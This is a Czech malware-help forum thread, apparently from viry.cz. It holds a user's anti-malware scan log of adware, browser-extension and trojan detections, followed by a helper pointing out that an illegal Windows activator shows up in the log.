PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_.9, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.Multiplug, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_.9, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.Multiplug, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Paeb94dbd_393f_465d_b99b_bdcdcf131507_.Paeb94dbd_393f_465d_b99b_bdcdcf131507_.9, , [59dcff70b1d938fe0195cf65fd05bb45],
PUP.Optional.DiscountFrenzy.A, HKLM\SOFTWARE\WOW6432NODE\Discount_Frenzy-nv, , [7eb74f206f1be74f4f7020d129daa957],
PUP.Optional.DiscountFrenzy.A, HKLM\SOFTWARE\WOW6432NODE\Discount_Frenzy-nv-ie, , [a5902e413852b680596628c92ad9a65a],
PUP.Optional.InternetSpeedChecker.A, HKLM\SOFTWARE\WOW6432NODE\Internet Speed Checker-nv, , [5fd6bcb31773171f236b5870cd36d729],
PUP.Optional.InternetSpeedChecker.A, HKLM\SOFTWARE\WOW6432NODE\Internet Speed Checker-nv-ie, , [9b9a3936e3a7f343622c0bbd3bc87090],
PUP.Optional.Ttessab.A, HKLM\SOFTWARE\WOW6432NODE\Ttessab, , [67ce2f40e3a7df577d356591ec1744bc],
PUP.Optional.CrossRider.C, HKLM\SOFTWARE\WOW6432NODE\APPDATALOW\SOFTWARE\Crossrider, , [a68f8ce3bcce3afc9f52f6c97390669a],
PUP.Optional.DiscountFrenzy.A, HKU\S-1-5-21-3711557676-1242365459-2970172598-1000\SOFTWARE\Discount_Frenzy-nv, , [231290df3c4ec076823ec62b5ea512ee],
PUP.Optional.DiscountFrenzy.A, HKU\S-1-5-21-3711557676-1242365459-2970172598-1000\SOFTWARE\Discount_Frenzy-nv-ie, , [54e171fe9befb97d7848747db2517b85],
PUP.Optional.InternetSpeedChecker.A, HKU\S-1-5-21-3711557676-1242365459-2970172598-1000\SOFTWARE\Internet Speed Checker-nv, , [e05527489af0072f5c33eedafc073ec2],
PUP.Optional.InternetSpeedChecker.A, HKU\S-1-5-21-3711557676-1242365459-2970172598-1000\SOFTWARE\Internet Speed Checker-nv-ie, , [6ec7fa752a60f145127d8b3db35034cc],

Hodnoty registru: 0
(Nenalezeny žádné škodlivé položky)

Data registru: 0
(Nenalezeny žádné škodlivé položky)

Složky: 14
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.NoMoreAds.A, C:\ProgramData\NoMore Ads, , [ae874a25157594a204f58923dd260bf5],
PUP.Optional.AdBlockerManger.A, C:\ProgramData\AdBlocker Manger, , [4aebff7033577eb8d4582e7f9370db25],
PUP.Optional.RandomPrice.A, C:\ProgramData\RaNdomPriCe, , [4aeb511e6f1b7abc32f54b6442c118e8],
PUP.Optional.GreatSave4U.A, C:\ProgramData\GreatSAve4U, , [e94ce08fcebc70c6686cb2097d8617e9],

Soubory: 70
PUP.Optional.Nova.A, C:\Program Files (x86)\aad30ca0-2856-4784-822d-3c50a2865bd0\c4eef4ed-3d1f-4ec3-b93b-eb3269492ecd.dll, , [4ee73936b2d8f64017fdea25a9594ab6],
PUP.Optional.Nova.A, C:\Program Files (x86)\Adobe\97108cc2-c6a0-47ae-ab68-ad39468dff64.dll, , [270efb74b0dac5713dd7808f22e0d12f],
PUP.Optional.Nova.A, C:\Program Files (x86)\Adobe Arkalis\aa803234-8a95-431a-8284-c03adbb3337e.dll, , [d461e58ae7a34aec3ed63fd021e154ac],
Trojan.Agent, C:\Program Files (x86)\Saving Smart\Saving Smart.exe, , [171eb8b705859b9b11a87895af53a957],
PUP.HackTool.Agent, C:\Program Files (x86)\Sniper Elite 3\steam_api.dll, , [b77e115eff8b43f32d0021d0966b22de],
PUP.Optional.Nova.A, C:\Program Files (x86)\ead1d464-3c89-4c86-80ea-78f66b58bffd\63e74c03-897a-4cb4-8d32-d66b4e5094c0.dll, , [6cc97ff078120d29bd57bd52c1411ee2],
PUP.Optional.Multiplug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\DDownSavE\KQfKCX6DHGIs4L.dll.vir, , [3302bcb3a5e580b6e192fb38a35f857b],
PUP.Optional.Multiplug, C:\AdwCleaner\Quarantine\C\Program Files (x86)\DDownSavE\KQfKCX6DHGIs4L.x64.dll.vir, , [36ff313e21698da9e8a275c508fa4cb4],
PUP.Optional.Multiplug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\DownnSaeve\DownnSaeve.exe.vir, , [2b0a7df2afdbe056aef5a190e71b6d93],
PUP.Optional.Multiplug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\EExstraCoupoNN\NwWJCBXyY8c0zR.dll.vir, , [8da8a9c6a1e9bd792251b1829d65bf41],
PUP.Optional.Multiplug, C:\AdwCleaner\Quarantine\C\Program Files (x86)\EExstraCoupoNN\NwWJCBXyY8c0zR.x64.dll.vir, , [25101f505634a1951a700832b44e7e82],
PUP.Optional.Multiplug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\Fuun2uSuave\ArYGIEK82Z3FTK.dll.vir, , [3cf9432c395158dee78c989be71bf808],
PUP.Optional.Multiplug, C:\AdwCleaner\Quarantine\C\Program Files (x86)\Fuun2uSuave\ArYGIEK82Z3FTK.x64.dll.vir, , [9b9a125d05852c0aec9eec4e6b97a060],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe.vir, , [b2834a25058526107f39a2a448ba639d],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe.vir, , [d65fd29d97f3d85ed6e2cb7b3ec4bc44],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe.vir, , [88adf679cac03afc2791460045bd5ba5],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe.vir, , [90a559168cfe5fd700b82422a55d9868],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe.vir, , [ec49135c33579d99942489bdc04223dd],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\goopdate.dll.vir, , [2c09402ffb8fe056a216b78f52b013ed],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\goopdateres_en.dll.vir, , [68cdb0bfbdcd1b1bae0a16309e64d62a],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll.vir, , [5ed7323d5c2e44f2a90ff353b44e1be5],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\psmachine.dll.vir, , [0b2aeb847119be788137370f639f24dc],
PUP.Optional.ModGoog, C:\AdwCleaner\Quarantine\C\Program Files (x86)\globalUpdate\Update\1.3.25.0\psuser.dll.vir, , [a194f17ef991e35373450244b052b848],
PUP.Optional.MultiPlug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\SaaveeNewaAppz\AtJhpoczEBJ1rP.dll.vir, , [4aeb81eecebc5cdae1a581c1d23055ab],
PUP.Optional.MultiPlug.A, C:\AdwCleaner\Quarantine\C\Program Files (x86)\SaaveeNewaAppz\AtJhpoczEBJ1rP.x64.dll.vir, , [7cb97bf4d5b5f54194f3330e847e0bf5],
Trojan.Agent, C:\AdwCleaner\Quarantine\C\Program Files (x86)\uniesaaleS\pKkqerSCv8abjD.exe.vir, , [ac89e9862b5f2214c5f40805788adf21],
PUP.Optional.Multiplug, C:\AdwCleaner\Quarantine\C\Program Files (x86)\uniesaaleS\pKkqerSCv8abjD.x64.dll.vir, , [2e07bfb08efc9c9aafe73bf9b151a45c],
Trojan.Agent, C:\AdwCleaner\Quarantine\C\Program Files (x86)\unisaalues\unisaalues.exe.vir, , [0530155a622874c2e2d7e528ce34a65a],
Trojan.Agent, C:\AdwCleaner\Quarantine\C\Program Files (x86)\youtubeadblocker\vrFFBjlUJYa1dM.exe.vir, , [3df8620d83073df922973bd2a65cc33d],
PUP.Optional.Multiplug, C:\AdwCleaner\Quarantine\C\Program Files (x86)\youtubeadblocker\vrFFBjlUJYa1dM.x64.dll.vir, , [ef4682ed82084de9663046eec2400df3],
PUP.Optional.Multiplug, C:\ProgramData\GreatSAve4U\3LjiVx0LLu6DOq.x64.dll, , [56df5b148406280e3e58e64ec042aa56],
PUP.Optional.Multiplug, C:\ProgramData\RaNdomPriCe\QErss20sIz5z6g.x64.dll, , [1025beb167236dc922741f15ea18de22],
PUP.Optional.Multiplug, C:\ProgramData\SaveRExtension\DvK5eDl2VfiJmX.x64.dll, , [59dcff70b1d938fe0195cf65fd05bb45],
Trojan.Agent.W, C:\Windows\Setup\SCRIPTS\Windows7Loader.exe, , [ea4bfe71fe8ce353c80f6a3d5ea77e82],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212\lsdb.js, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212\background.html, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212\content.js, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212\kxznkLm5r.js, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\blkehhkdbdbaggkkapkcaoanffomhgjl\212\manifest.json, , [191c7bf4beccc571b16d97bd6d9845bb],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133\lsdb.js, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133\background.html, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133\content.js, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133\manifest.json, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpkonlbialedjgeegikdallckpnliboc\133\P.js, , [6ec781ee098142f4110dfb59ae575aa6],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135\lsdb.js, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135\background.html, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135\content.js, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135\iAu0oJ.js, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\135\manifest.json, , [44f1b6b95e2c191d1509dd7780857c84],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147\lsdb.js, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147\background.html, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147\content.js, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147\manifest.json, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug.A, C:\Users\Amd\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmfkifgbhiddnmdmnhlidngbbahdmomd\147\yJ1upj86.js, , [68cdf07f7f0ba492a47a83d155b0fd03],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj\lsdb.js, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj\background.html, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj\content.js, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj\manifest.json, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jhdakniennaikhcojfackbbfgbeefcnj\MxPadjoihK.js, , [7db83c3399f136009bd697be858053ad],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp\lsdb.js, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp\aTCAe4N.js, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp\background.html, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp\content.js, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.MultiPlug, C:\ProgramData\jleacilhnffllgfndinnlakofockehdp\manifest.json, , [f73ecba4ed9def47d79a72e3f70e966a],
PUP.Optional.NoMoreAds.A, C:\ProgramData\NoMore Ads\NoMore Ads.exe, , [ae874a25157594a204f58923dd260bf5],
PUP.Optional.AdBlockerManger.A, C:\ProgramData\AdBlocker Manger\AdBlocker Manger.exe, , [4aebff7033577eb8d4582e7f9370db25],
PUP.Optional.RandomPrice.A, C:\ProgramData\RaNdomPriCe\QErss20sIz5z6g.dat, , [4aeb511e6f1b7abc32f54b6442c118e8],
PUP.Optional.RandomPrice.A, C:\ProgramData\RaNdomPriCe\QErss20sIz5z6g.tlb, , [4aeb511e6f1b7abc32f54b6442c118e8],
PUP.Optional.GreatSave4U.A, C:\ProgramData\GreatSAve4U\3LjiVx0LLu6DOq.dat, , [e94ce08fcebc70c6686cb2097d8617e9],
PUP.Optional.GreatSave4U.A, C:\ProgramData\GreatSAve4U\3LjiVx0LLu6DOq.tlb, , [e94ce08fcebc70c6686cb2097d8617e9],

Fyzické sektory: 0
(Nenalezeny žádné škodlivé položky)


(end)

[Márty84]

Ten system asi moc legalni nebude, ze?

[Nomad]

Systém je křišťálově čistý,že ani křišťál křišťálově čistší být nemůže.

[Márty84]

A proto je tam jasne videt pouzity nelegalni aktivator

Bud vas nekdo osulil, nebo chcete osulit vy mne. Kazdopadne ten crack je tam jasne videt a sam tam skocit nemohl, je vedome pouzity



23.5. http://forum.viry.cz/viewtopic.php?f=12&t=123975